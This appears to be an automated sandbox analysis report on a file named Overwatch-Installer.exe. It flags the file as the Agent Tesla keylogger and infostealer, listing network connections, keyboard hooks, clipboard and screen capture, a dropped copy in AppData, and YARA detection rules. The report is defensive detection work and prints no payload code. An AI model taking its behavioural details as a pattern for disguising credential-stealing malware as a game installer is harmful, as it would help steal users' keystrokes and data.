Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50358
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50351
Source: unknown	Network traffic detected: HTTP traffic on port 50317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50353
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50357
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50356
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50360
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50369
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50361
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50363
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50365
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50367
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50371
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50370
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50300
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50314
Source: unknown	Network traffic detected: HTTP traffic on port 50384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50329
Source: unknown	Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50323
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095

Key, Mouse, Clipboard, Microphone and Screen Capturing

Detected Agent Tesla keylogger

Source: Overwatch-Installer.exe, 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp	Memory string: get_Clipboard
Source: Overwatch-Installer.exe, 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp	Memory string: set_Sendwebcam
Source: Overwatch-Installer.exe, 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp	Memory string: get_ComputerName
Source: Overwatch-Installer.exe, 00000000.00000002.4512994747.0000000006610000.00000004.08000000.00040000.00000000.sdmp	Memory string: get_Username

Contains functionality to capture screen (.Net source)

Source: Overwatch-Installer.exe, B.cs	.Net Code: O_U
Source: nefgd.exe.0.dr, B.cs	.Net Code: O_U

Installs a global keyboard hook

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Overwatch-Installer.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\nefgd\nefgd.exe			Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Overwatch-Installer.exe, type: SAMPLE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: Overwatch-Installer.exe, type: SAMPLE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Overwatch-Installer.exe, type: SAMPLE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: Overwatch-Installer.exe, type: SAMPLE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: Overwatch-Installer.exe PID: 7160, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: Process Memory Space: nefgd.exe PID: 5952, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED	Matched rule: AgentTesla Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Yara detected AgentTesla

Source: Yara match	File source: Process Memory Space: Overwatch-Installer.exe PID: 7160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nefgd.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Overwatch-Installer.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Memory allocated: 77A30000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 70AC0000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 70FC0000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 77030000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 701C0000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 70DC0000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Memory allocated: 726C0000 page read and write	Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_05BF2D92 NtQuerySystemInformation,	0_2_05BF2D92
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_05BF2D57 NtQuerySystemInformation,	0_2_05BF2D57
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06122EBA NtQuerySystemInformation,	3_2_06122EBA
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06122E7F NtQuerySystemInformation,	3_2_06122E7F

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_052F0F78	0_2_052F0F78
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_052F3E4F	0_2_052F3E4F
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_052F0F68	0_2_052F0F68
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_052F1299	0_2_052F1299
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_06705550	0_2_06705550
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_0670A138	0_2_0670A138
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_0670A7E8	0_2_0670A7E8
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_06700070	0_2_06700070
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_0670001F	0_2_0670001F
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_0670A7D9	0_2_0670A7D9
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_06874120	0_2_06874120
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_05823CBF	3_2_05823CBF
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_05820F78	3_2_05820F78
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_05821299	3_2_05821299
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_05820F69	3_2_05820F69
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06B309C5	3_2_06B309C5
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06C3A7E8	3_2_06C3A7E8
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06C35550	3_2_06C35550
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06C3A138	3_2_06C3A138
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06C3A7D9	3_2_06C3A7D9
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06C351A8	3_2_06C351A8
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06DA2F38	3_2_06DA2F38
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 4_2_01090F78	4_2_01090F78
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 4_2_01091299	4_2_01091299

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 9900

Source: Overwatch-Installer.exe, 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs Overwatch-Installer.exe
Source: Overwatch-Installer.exe, 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefirefox.exe4 vs Overwatch-Installer.exe
Source: Overwatch-Installer.exe, 00000000.00000000.2009514442.0000000000A92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOverwatch-Setup.exeD vs Overwatch-Installer.exe
Source: Overwatch-Installer.exe, 00000000.00000002.4512994747.0000000006610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs Overwatch-Installer.exe
Source: Overwatch-Installer.exe	Binary or memory string: OriginalFilenameIELibrary.dll4 vs Overwatch-Installer.exe
Source: Overwatch-Installer.exe	Binary or memory string: OriginalFilenamefirefox.exe4 vs Overwatch-Installer.exe
Source: Overwatch-Installer.exe	Binary or memory string: OriginalFilenameOverwatch-Setup.exeD vs Overwatch-Installer.exe

Source: Overwatch-Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Overwatch-Installer.exe, type: SAMPLE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: Overwatch-Installer.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Overwatch-Installer.exe, type: SAMPLE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: Overwatch-Installer.exe, type: SAMPLE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.0.Overwatch-Installer.exe.aaaf90.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.0.Overwatch-Installer.exe.aa6cb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.0.Overwatch-Installer.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
